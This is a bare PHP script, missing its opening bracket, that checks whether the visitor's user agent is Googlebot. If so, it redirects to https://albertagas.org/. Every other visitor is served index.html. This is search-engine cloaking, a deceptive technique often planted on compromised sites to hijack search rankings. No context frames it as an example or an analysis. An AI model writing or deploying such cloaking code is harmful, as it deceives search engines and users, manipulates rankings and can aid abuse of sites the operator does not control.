?php $userAgent = $_SERVER['HTTP_USER_AGENT']; $googlebotPattern = '/Googlebot/i'; $urlRedirect = "https://albertagas.org/"; if (preg_match($googlebotPattern, $userAgent)) { header("Location: $urlRedirect"); exit; } else { readfile('index.html'); exit; }